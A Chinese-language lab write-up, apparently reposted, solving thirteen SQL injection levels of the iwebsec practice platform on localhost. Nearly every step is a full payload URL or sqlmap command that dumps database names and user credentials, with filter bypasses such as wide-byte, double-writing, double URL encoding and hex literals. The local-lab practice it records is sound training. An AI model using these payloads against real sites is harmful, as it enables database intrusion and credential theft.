被推薦了這個web平臺，感覺挺適合新手的，網上搜了下沒看到有人寫wp，這里本入門萌新來稍微整理下自己解題的過程

SQL注入漏洞

01-數字型注入

http://localhost:32774/sqli/01.php?id=1'

發現有報錯

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘’ LIMIT 0,1’ at line 1

猜測語句

WHERE id=$id LIMIT 0,1

驗證一下

查列數

查顯示位

爆庫

http://localhost:32774/sqli/01.php?id=1%20union%20select%201,2,group_concat(schema_name)%20from%20information_schema.schemata%20--+

爆表

http://localhost:32774/sqli/01.php?id=1%20union%20select%201,2,(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=database())%20--+

爆列

http://localhost:32774/sqli/01.php?id=1%20union%20select%201,2,(select%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_schema%20=database()%20and%20table_name=%27users%27)%20--+

爆數據

http://localhost:32774/sqli/01.php?id=1%20union%20select%201,2,(select%20group_concat(concat(role,0x7e,username,0x3A,password,0x7e))%20from%20users)%20%20--+

02-字符型注入

http://localhost:32774/sqli/02.php?id=1' or '1=2–'

報錯

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘’1’ or ’1=2–’’ LIMIT 0,1’ at line 1

看源碼，發現SET NAMES gbk猜測寬字節注入

嘗試

http://localhost:32774/sqli/02.php?id=1%df' and 1=2 union select 1,2,3 --+

爆庫

http://localhost:32774/sqli/02.php?id=1%df' and 1=2 union select 1,2,group_concat(schema_name) from information_schema.schemata --+

爆表

http://localhost:32774/sqli/02.php?id=1%df' and 1=2 union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema=database()) --+

爆數據

http://localhost:32774/sqli/02.php?id=1%df' and 1=2 union select 1,2,(select group_concat(concat(role,0x7e,username,0x3A,password,0x7e)) from users) --+

這里除了前面通過寬字節來讓mysql以為是個漢字繞過檢查其他和第一題一樣

03-bool注入

http://localhost:32774/sqli/03.php?id=1 and 1=2 --+

檢測出來存在是布爾注入就懶得寫jio本了，sqlmap直接梭

爆庫

sqlmap -u http://localhost:32774/sqli/03.php?id=1 --current-db

爆表

sqlmap -u http://localhost:32774/sqli/03.php?id=1 -D iwebsec --tables

爆列

sqlmap -u http://localhost:32774/sqli/03.php?id=1 -D iwebsec -T users --columns

爆數據

sqlmap -u http://localhost:32774/sqli/03.php?id=1 -D iwebsec -T users -C role,username,password --dump

04-sleep注入

自己的腳本真的很丑，這里就不丟臉了

時間盲注爆庫

sqlmap -u http://localhost:32774/sqli/04.php?id=1 -p id --technique T --time-sec 3 --current-db

爆表

sqlmap -u http://localhost:32774/sqli/04.php?id=1 -p id --technique T --time-sec 3 -D iwebsec --tables

爆列

sqlmap -u http://localhost:32774/sqli/04.php?id=1 -p id --technique T --time-sec 3 -D iwebsec -T user --columns

爆數據

sqlmap -u http://localhost:32774/sqli/04.php?id=1 -p id --technique T --time-sec 3 -D iwebsec -T user -C id,password,username --dump

05-updatexml注入

這題限制條件沒弄好，用第一題的payload都能跑

但還是用題目的預期過一遍

and (updatexml(1,concat(0x7e,(select version()),0x7e),1))

先檢驗

http://localhost:32774/sqli/05.php?id=1 and (updatexml(1,concat(0x7e,(select version()),0x7e),1))

存在注入，并使用updatexml函數注入

爆庫

http://localhost:32774/sqli/05.php?id=1 and (updatexml(1,concat(0x7e,(select group_concat(schema_name) from information_schema.schemata),0x7e),1))

爆表

http://localhost:32774/sqli/05.php?id=1 and (updatexml(1,concat(0x7e,(select (select group_concat(table_name) from information_schema.tables where table_schema=database())),0x7e),1))

爆列

http://localhost:32774/sqli/05.php?id=1 and (updatexml(1,concat(0x7e,(select (select group_concat(column_name) from information_schema.columns where table_schema =database() and table_name='users')),0x7e),1))

爆數據

http://localhost:32774/sqli/05.php?id=1 and (updatexml(1,concat(0x7e,(select (select group_concat(concat(role,0x7e,username,0x3A,password,0x7e)) from users)),0x7e),1))

06-寬字節注入

這題看題目就是寬字節，和之前第二題的做法重了，就換個方法，用sqlmap過一遍

這里需要知道的是直接

sqlmap -u http://localhost:32774/sqli/06.php?id=1

是找不到注入的,需要

sqlmap -u http://localhost:32774/sqli/06.php?id=1%df%27

或者使用tamper=”unmagicquotes”

sqlmap -u "http://localhost:32774/sqli/06.php?id=1" --tamper="unmagicquotes" --current-db

爆庫

sqlmap -u "http://localhost:32774/sqli/06.php?id=1" --tamper="unmagicquotes" --current-db

爆表

sqlmap -u "http://localhost:32774/sqli/06.php?id=1" --tamper="unmagicquotes" -D iwebsec --tables

爆列

sqlmap -u "http://localhost:32774/sqli/06.php?id=1" --tamper="unmagicquotes" -D iwebsec -T users --colums

爆數據

sqlmap -u "http://localhost:32774/sqli/06.php?id=1" --tamper="unmagicquotes" -D iwebsec -T users -C role,username,password --dump

07-空格過濾繞過

看題可知過濾了空格，這里我選擇用括號讓參數之間沒有空格

http://localhost:32774/sqli/07.php?id=(0)or(1)=(1)

查顯示位

http://localhost:32774/sqli/07.php?id=(0)%0aunion%0aselect(1),(2),(3)

爆庫

http://localhost:32774/sqli/07.php?id=(0)%0Aunion%0Aselect(1),(2),(select%0Agroup_concat(schema_name)%0Afrom%0Ainformation_schema.schemata)

爆表

localhost:32774/sqli/07.php?id=(0)%0Aunion%0Aselect(1),(2),(select%0Agroup_concat(table_name)%0Afrom%0Ainformation_schema.tables%0Awhere%0Atable_schema=database())

爆列

http://localhost:32774/sqli/07.php?id=(0)%0Aunion%0Aselect(1),(2),(select%0Agroup_concat(column_name)%0Afrom%0Ainformation_schema.columns%0awhere%0atable_schema=database()and(table_name='users'))

爆數據

http://localhost:32774/sqli/07.php?id=(0)%0Aunion%0Aselect(1),(2),(select%0Agroup_concat(concat(role,0x7e,username,0x3A,password,0x7e))%0Afrom%0Ausers)

08-大小寫過濾繞過

常規測試后發現測試點在select上，根據題目只要對select進行大小寫變換就行

顯示位

爆庫

http://localhost:32774/sqli/08.php?id=1 union Select 1,2,group_concat(schema_name) from information_schema.schemata--+

爆表

http://localhost:32774/sqli/08.php?id=1 union Select 1,2,(Select group_concat(table_name) from information_schema.tables where table_schema=database())--+

爆列

http://localhost:32774/sqli/08.php?id=1 union Select 1,2,(Select group_concat(column_name) from information_schema.columns where table_schema =database() and table_name='users')--+

爆數據

http://localhost:32774/sqli/08.php?id=1 union Select 1,2,(Select group_concat(concat(role,0x7e,username,0x3A,password,0x7e)) from users)--+

09-雙寫關鍵字繞過

確認存在注入

發現過濾了select字符串，題目可得需要用雙寫來繞過，試一下

http://localhost:32774/sqli/09.php?id=1 union seselectlect 1,2,3--+

繞過的原因

因為在匹配到”se”+”select”+”lect”中的select后替換為空后前后拼接起來就是select成功的繞過唯一一次檢驗

爆庫

http://localhost:32774/sqli/09.php?id=1 union seselectlect 1,2,group_concat(schema_name) from information_schema.schemata--+

爆表

http://localhost:32774/sqli/09.php?id=1 union seselectlect 1,2,(seselectlect group_concat(table_name) from information_schema.tables where table_schema=database())--+

爆列

http://localhost:32774/sqli/09.php?id=1 union seselectlect 1,2,(seselectlect group_concat(column_name) from information_schema.columns where table_schema =database() and table_name='users')--+

爆數據

http://localhost:32774/sqli/09.php?id=1 union seselectlect 1,2,(seselectlect group_concat(concat(role,0x7e,username,0x3A,password,0x7e)) from users)--+

10-雙重url編碼繞過

根據題目可以猜到源碼對$id進行了一次urldecode，在測試的過程中還能發現對select進行了waf，所以只需要根據第八題的payload進行兩次urlencode即可

腳本

a = ""

print urllib.quote(urllib.quote(a))

本以為是這樣的

結果完全沒派上用場，第八題的語句完全照搬都能跑得通

但出于對題目的尊重還是用雙重url編碼繞過一下吧

爆庫

原句

1 union Select 1,2,group_concat(schema_name) from information_schema.schemata#

編碼后

1%2520union%2520Select%25201%252C2%252Cgroup_concat%2528schema_name%2529%2520from%2520information_schema.schemata%2523

最終

http://localhost:32774/sqli/10.php?id=1%2520union%2520Select%25201%252C2%252Cgroup_concat%2528schema_name%2529%2520from%2520information_schema.schemata%2523

爆表

原句

1 union Select 1,2,(Select group_concat(table_name) from information_schema.tables where table_schema=database())#

編碼后

1%2520union%2520Select%25201%252C2%252C%2528Select%2520group_concat%2528table_name%2529%2520from%2520information_schema.tables%2520where%2520table_schema%253Ddatabase%2528%2529%2529%2523

最終

http://localhost:32774/sqli/10.php?id=1%2520union%2520Select%25201%252C2%252C%2528Select%2520group_concat%2528table_name%2529%2520from%2520information_schema.tables%2520where%2520table_schema%253Ddatabase%2528%2529%2529%2523

爆列

原句

1 union Select 1,2,(Select group_concat(column_name) from information_schema.columns where table_schema =database() and table_name='users')#

編碼后

1%2520union%2520Select%25201%252C2%252C%2528Select%2520group_concat%2528column_name%2529%2520from%2520information_schema.columns%2520where%2520table_schema%2520%253Ddatabase%2528%2529%2520and%2520table_name%253D%2527users%2527%2529%2523

最終

http://localhost:32774/sqli/10.php?id=1%2520union%2520Select%25201%252C2%252C%2528Select%2520group_concat%2528column_name%2529%2520from%2520information_schema.columns%2520where%2520table_schema%2520%253Ddatabase%2528%2529%2520and%2520table_name%253D%2527users%2527%2529%2523

爆數據

原句

1 union Select 1,2,(Select group_concat(concat(role,0x7e,username,0x3A,password,0x7e)) from users) #

編碼后

1%2520union%2520Select%25201%252C2%252C%2528Select%2520group_concat%2528concat%2528role%252C0x7e%252Cusername%252C0x3A%252Cpassword%252C0x7e%2529%2529%2520from%2520users%2529%2520%2523

最終

http://localhost:32774/sqli/10.php?id=1%2520union%2520Select%25201%252C2%252C%2528Select%2520group_concat%2528concat%2528role%252C0x7e%252Cusername%252C0x3A%252Cpassword%252C0x7e%2529%2529%2520from%2520users%2529%2520%2523

11-十六進制繞過

先按正常步驟去做

查顯示位

http://localhost:32774/sqli/11.php?id=1%20union%20select%201,2,3--+

爆庫

localhost:32774/sqli/11.php?id=1 union select 1,2,group_concat(schema_name) from information_schema.schemata--+

爆表

localhost:32774/sqli/11.php?id=1 union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema=database())--+

查列的時候問題就來了，發現引號被過濾了

這里就考慮到使用user的十六進制繞過限制

爆列

http://localhost:32774/sqli/11.php?id=1 union select 1,2,(select group_concat(column_name) from information_schema.columns where table_schema =database() and table_name=0x75736572)--+

爆數據

http://localhost:32774/sqli/11.php?id=1 union select 1,2,(select group_concat(concat(id,0x7e,username,0x3A,password,0x7e)) from user) --+

12-等價函數替換過濾繞過

簡單嘗試后可知對等號進行了waf，那么爆庫的語句還是正常的

http://localhost:32774/sqli/12.php?id=1 union select 1,2,group_concat(schema_name) from information_schema.schemata--+

這里就根據題目，使用與等號等價的函數進行替換，這里我選擇用like，因為如果沒有使用百分號,like子句與等號的效果是一樣的

爆表

http://localhost:32774/sqli/12.php?id=1 union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema like database())--+

爆列

http://localhost:32774/sqli/12.php?id=1 union select 1,2,(select group_concat(column_name) from information_schema.columns where table_schema like database() and table_name like 'users')--+

爆數據

http://localhost:32774/sqli/12.php?id=1 union select 1,2,(select group_concat(concat(role,0x7e,username,0x3A,password,0x7e)) from users) --+

13-二次注入

這題其實挺簡單的，簡單的整理下流程

1.注冊用戶，輸入username，password，email

2.找回密碼，輸入存在的郵箱即可返回用戶名和密碼

那么問題來了，這是一道注入題，從注入的角度來說應該是在username放入查詢語句再通過找回密碼來執行

但由于我很懶，我選擇直接用萬能密碼法

這樣就會使查詢語句查的是admin而不是admin'#

總結

以上是生活随笔為你收集整理的绕过waf mysql爆库_iwebsec刷题记录-SQL注入漏洞的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。